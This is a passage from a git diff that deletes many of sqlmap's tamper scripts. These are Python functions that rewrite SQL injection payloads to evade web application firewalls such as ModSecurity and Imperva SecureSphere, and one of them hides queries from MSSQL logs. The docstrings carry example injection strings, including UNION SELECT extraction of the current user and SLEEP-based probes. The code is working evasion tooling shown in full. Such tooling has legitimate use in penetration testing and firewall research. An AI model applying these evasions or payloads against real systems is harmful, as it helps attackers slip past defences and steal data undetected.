permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL)) - -def tamper(payload, **kwargs): - """ - Replaces all occurances of operator equal ('=') with operator 'LIKE' - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') - * The LIKE operator is SQL standard. Hence, this tamper script - should work against all (?) databases - - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id LIKE 1' - """ - - retVal = payload - - if payload: - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) - - return retVal diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py deleted file mode 100644 index 5a3acadf..00000000 --- a/tamper/escapequotes.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import base64 - -from lib.core.enums import PRIORITY -from lib.core.settings import UNICODE_ENCODING - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Slash escape quotes (' and ") - - >>> tamper('1" AND SLEEP(5)#') - '1\\\\" AND SLEEP(5)#' - """ - - return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/tamper/greatest.py b/tamper/greatest.py deleted file mode 100644 index 50138315..00000000 --- a/tamper/greatest.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces greater than operator ('>') with 'GREATEST' counterpart - - Tested against: - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The GREATEST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases - - >>> tamper('1 AND A > B') - '1 AND GREATEST(A,B+1)=A' - """ - - retVal = payload - - if payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload) - - if match: - _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4)) - retVal = retVal.replace(match.group(0), _) - - return retVal diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py deleted file mode 100644 index 430103fb..00000000 --- a/tamper/halfversionedmorekeywords.py +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Adds versioned MySQL comment before each keyword - - Requirement: - * MySQL < 5.1 - - Tested against: - * MySQL 4.0.18, 5.0.22 - - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html - - >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") - "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: - return match.group().replace(word, "/*!0%s" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) - retVal = retVal.replace(" /*!0", "/*!0") - - return retVal diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py deleted file mode 100644 index 03d422ab..00000000 --- a/tamper/ifnull2ifisnull.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' - - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) - - Tested against: - * MySQL 5.0 and 5.5 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IFNULL() function - - >>> tamper('IFNULL(1, 2)') - 'IF(ISNULL(1),2,1)' - """ - - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None - - for i in xrange(index + len("IFNULL("), len(payload)): - if depth == 1 and payload[i] == ',': - comma = i - - elif depth == 1 and payload[i] == ')': - end = i - break - - elif payload[i] == '(': - depth += 1 - - elif payload[i] == ')': - depth -= 1 - - if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] - else: - break - - return payload diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py deleted file mode 100644 index 58ed7318..00000000 --- a/tamper/informationschemacomment.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier - - >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') - 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' - """ - - retVal = payload - - if payload: - retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload) - - return retVal diff --git a/tamper/lowercase.py b/tamper/lowercase.py deleted file mode 100644 index 93ed2150..00000000 --- a/tamper/lowercase.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces each keyword character with lower case value - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - * This tamper script should work against all (?) databases - - >>> tamper('INSERT') - 'insert' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): - word = match.group() - - if word.upper() in kb.keywords: - retVal = retVal.replace(word, word.lower()) - - return retVal diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py deleted file mode 100644 index a904d51e..00000000 --- a/tamper/modsecurityversioned.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import randomInt -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Embraces complete query with versioned comment - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 - - Notes: - * Useful to bypass ModSecurity WAF/IDS - - >>> import random - >>> random.seed(0) - >>> tamper('1 AND 2>1--') - '1 /*!30874AND 2>1*/--' - """ - - retVal = payload - - if payload: - postfix = '' - for comment in ('#', '--', '/*'): - if comment in payload: - postfix = payload[payload.find(comment):] - payload = payload[:payload.find(comment)] - break - if ' ' in payload: - retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) - - return retVal diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py deleted file mode 100644 index 7de6e440..00000000 --- a/tamper/modsecurityzeroversioned.py +++ /dev/null @@ -1,44 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Embraces complete query with zero-versioned comment - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 - - Notes: - * Useful to bypass ModSecurity WAF/IDS - - >>> tamper('1 AND 2>1--') - '1 /*!00000AND 2>1*/--' - """ - - retVal = payload - - if payload: - postfix = '' - for comment in ('#', '--', '/*'): - if comment in payload: - postfix = payload[payload.find(comment):] - payload = payload[:payload.find(comment)] - break - if ' ' in payload: - retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix) - - return retVal diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py deleted file mode 100644 index e44758d6..00000000 --- a/tamper/multiplespaces.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Adds multiple spaces around SQL keywords - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - - Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt - - >>> random.seed(0) - >>> tamper('1 UNION SELECT foobar') - '1 UNION SELECT foobar' - """ - - retVal = payload - - if payload: - words = set() - - for match in re.finditer(r"[A-Za-z_]+", payload): - word = match.group() - - if word.upper() in kb.keywords: - words.add(word) - - for word in words: - retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) - retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) - - return retVal diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py deleted file mode 100644 index 7b46a35d..00000000 --- a/tamper/nonrecursivereplacement.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def tamper(payload, **kwargs): - """ - Replaces predefined SQL keywords with representations - suitable for replacement (e.g. .replace("SELECT", "")) filters - - Notes: - * Useful to bypass very weak custom filters - - >>> random.seed(0) - >>> tamper('1 UNION SELECT 2--') - '1 UNIOUNIONN SELESELECTCT 2--' - """ - - keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") - retVal = payload - - warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords) - warnMsg += "You can set it manually according to your needs" - singleTimeWarnMessage(warnMsg) - - if payload: - for keyword in keywords: - _ = random.randint(1, len(keyword) - 1) - retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) - - return retVal diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py deleted file mode 100644 index 03b9f193..00000000 --- a/tamper/overlongutf8.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Converts all characters in a given payload (not processing already - encoded) - - Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ - - >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') - 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 - else: - if payload[i] not in (string.ascii_letters + string.digits): - retVal += "%%C0%%%.2X" % (0x8A | ord(payload[i])) - else: - retVal += payload[i] - i += 1 - - return retVal diff --git a/tamper/percentage.py b/tamper/percentage.py deleted file mode 100644 index dfce2b39..00000000 --- a/tamper/percentage.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import string - -from lib.core.enums import PRIORITY -from lib.core.common import singleTimeWarnMessage - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0]) - -def tamper(payload, **kwargs): - """ - Adds a percentage sign ('%') infront of each character - - Requirement: - * ASP - - Tested against: - * Microsoft SQL Server 2000, 2005 - * MySQL 5.1.56, 5.5.11 - * PostgreSQL 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls - - >>> tamper('SELECT FIELD FROM TABLE') - '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' - """ - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 - elif payload[i] != ' ': - retVal += '%%%s' % payload[i] - i += 1 - else: - retVal += payload[i] - i += 1 - - return retVal diff --git a/tamper/randomcase.py b/tamper/randomcase.py deleted file mode 100644 index c4a353f1..00000000 --- a/tamper/randomcase.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import randomRange -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces each keyword character with random case value - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - * This tamper script should work against all (?) databases - - >>> import random - >>> random.seed(0) - >>> tamper('INSERT') - 'INseRt' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): - word = match.group() - - if word.upper() in kb.keywords: - while True: - _ = "" - - for i in xrange(len(word)): - _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - - if len(_) > 1 and _ not in (_.lower(), _.upper()): - break - - retVal = retVal.replace(word, _) - - return retVal diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py deleted file mode 100644 index 03d6710e..00000000 --- a/tamper/randomcomments.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import randomRange -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Add random comments to SQL keywords - - >>> import random - >>> random.seed(0) - >>> tamper('INSERT') - 'I/**/N/**/SERT' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"\b[A-Za-z_]+\b", payload): - word = match.group() - - if len(word) < 2: - continue - - if word.upper() in kb.keywords: - _ = word[0] - - for i in xrange(1, len(word) - 1): - _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) - - _ += word[-1] - - if "/**/" not in _: - index = randomRange(1, len(word) - 1) - _ = word[:index] + "/**/" + word[index:] - - retVal = retVal.replace(word, _) - - return retVal diff --git a/tamper/securesphere.py b/tamper/securesphere.py deleted file mode 100644 index 4eec056f..00000000 --- a/tamper/securesphere.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends special crafted string - - Notes: - * Useful for bypassing Imperva SecureSphere WAF - * Reference: http://seclists.org/fulldisclosure/2011/May/163 - - >>> tamper('1 AND 1=1') - "1 AND 1=1 and '0having'='0having'" - """ - - return payload + " and '0having'='0having'" if payload else payload diff --git a/tamper/sp_password.py b/tamper/sp_password.py deleted file mode 100644 index 466dc221..00000000 --- a/tamper/sp_password.py +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGH - -def tamper(payload, **kwargs): - """ - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs - - Requirement: - * MSSQL - - Notes: - * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure - * Reference: http://websec.ca/kb/sql_injection - - >>> tamper('1 AND 9227=9227-- ') - '1 AND 9227=9227-- sp_password' - """ - - retVal = "" - - if payload: - retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") - - return retVal diff --git a/tamper/space2comment.py b/tamper/space2comment.py deleted file mode 100644 index fbc035d4..00000000 --- a/tamper/space2comment.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with comments '/**/' - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls - - >>> tamper('SELECT id FROM users') - 'SELECT/**/id/**/FROM/**/users' - """ - - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += "/**/" - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == " " and not doublequote and not quote: - retVal += "/**/" - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2dash.py b/tamper/space2dash.py deleted file mode 100644 index b0d0305a..00000000 --- a/tamper/space2dash.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a dash comment ('--') followed by - a random string and a new line ('\n') - - Requirement: - * MSSQL - * SQLite - - Notes: - * Useful to bypass several web application firewalls - * Used during the ZeroNights SQL injection challenge, - https://proton.onsec.ru/contest/ - - >>> random.seed(0) - >>> tamper('1 AND 9227=9227') - '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - retVal += "--%s%%0A" % randomStr - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2hash.py b/tamper/space2hash.py deleted file mode 100644 index 89a17da8..00000000 --- a/tamper/space2hash.py +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random -import string - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Requirement: - * MySQL - - Tested against: - * MySQL 4.0, 5.0 - - Notes: - * Useful to bypass several web application firewalls - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html - - >>> random.seed(0) - >>> tamper('1 AND 9227=9227') - '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - retVal += "%%23%s%%0A" % randomStr - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py deleted file mode 100644 index f55ea596..00000000 --- a/tamper/space2morehash.py +++ /dev/null @@ -1,69 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import random -import string - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Requirement: - * MySQL >= 5.1.13 - - Tested against: - * MySQL 5.1.41 - - Notes: - * Useful to bypass several web application firewalls - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html - - >>> random.seed(0) - >>> tamper('1 AND 9227=9227') - '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' - """ - - def process(match): - word = match.group('word') - randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - - if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: - return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) - else: - return match.group() - - retVal = "" - - if payload: - payload = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload) - - for i in xrange(len(payload)): - if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - retVal += "%%23%s%%0A" % randomStr - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py deleted file mode 100644 index acc0881b..00000000 --- a/tamper/space2mssqlblank.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Requirement: - * Microsoft SQL Server - - Tested against: - * Microsoft SQL Server 2000 - * Microsoft SQL Server 2005 - - Notes: - * Useful to bypass several web application firewalls - - >>> random.seed(0) - >>> tamper('SELECT id FROM users') - 'SELECT%0Eid%0DFROM%07users' - """ - - # ASCII table: - # SOH 01 start of heading - # STX 02 start of text - # ETX 03 end of text - # EOT 04 end of transmission - # ENQ 05 enquiry - # ACK 06 acknowledge - # BEL 07 bell - # BS 08 backspace - # TAB 09 horizontal tab - # LF 0A new line - # VT 0B vertical TAB - # FF 0C new page - # CR 0D carriage return - # SO 0E shift out - # SI 0F shift in - blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace, end = False, False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += random.choice(blanks) - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - end = True - - elif payload[i] == " " and not doublequote and not quote: - if end: - retVal += random.choice(blanks[:-1]) - else: - retVal += random.choice(blanks) - - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py deleted file mode 100644 index 2ea1e537..00000000 --- a/tamper/space2mssqlhash.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a pound character ('#') followed by - a new line ('\n') - - Requirement: - * MSSQL - * MySQL - - Notes: - * Useful to bypass several web application firewalls - - >>> tamper('1 AND 9227=9227') - '1%23%0AAND%23%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - retVal += "%23%0A" - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py deleted file mode 100644 index 65c2ef18..00000000 --- a/tamper/space2mysqlblank.py +++ /dev/null @@ -1,71 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Requirement: - * MySQL - - Tested against: - * MySQL 5.1 - - Notes: - * Useful to bypass several web application firewalls - - >>> random.seed(0) - >>> tamper('SELECT id FROM users') - 'SELECT%0Bid%0DFROM%0Cusers' - """ - - # ASCII table: - # TAB 09 horizontal TAB - # LF 0A new line - # FF 0C new page - # CR 0D carriage return - # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) - blanks = ('%09', '%0A', '%0C', '%0D', '%0B') - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += random.choice(blanks) - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == " " and not doublequote and not quote: - retVal += random.choice(blanks) - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py deleted file mode 100644 index bebe92a8..00000000 --- a/tamper/space2mysqldash.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): 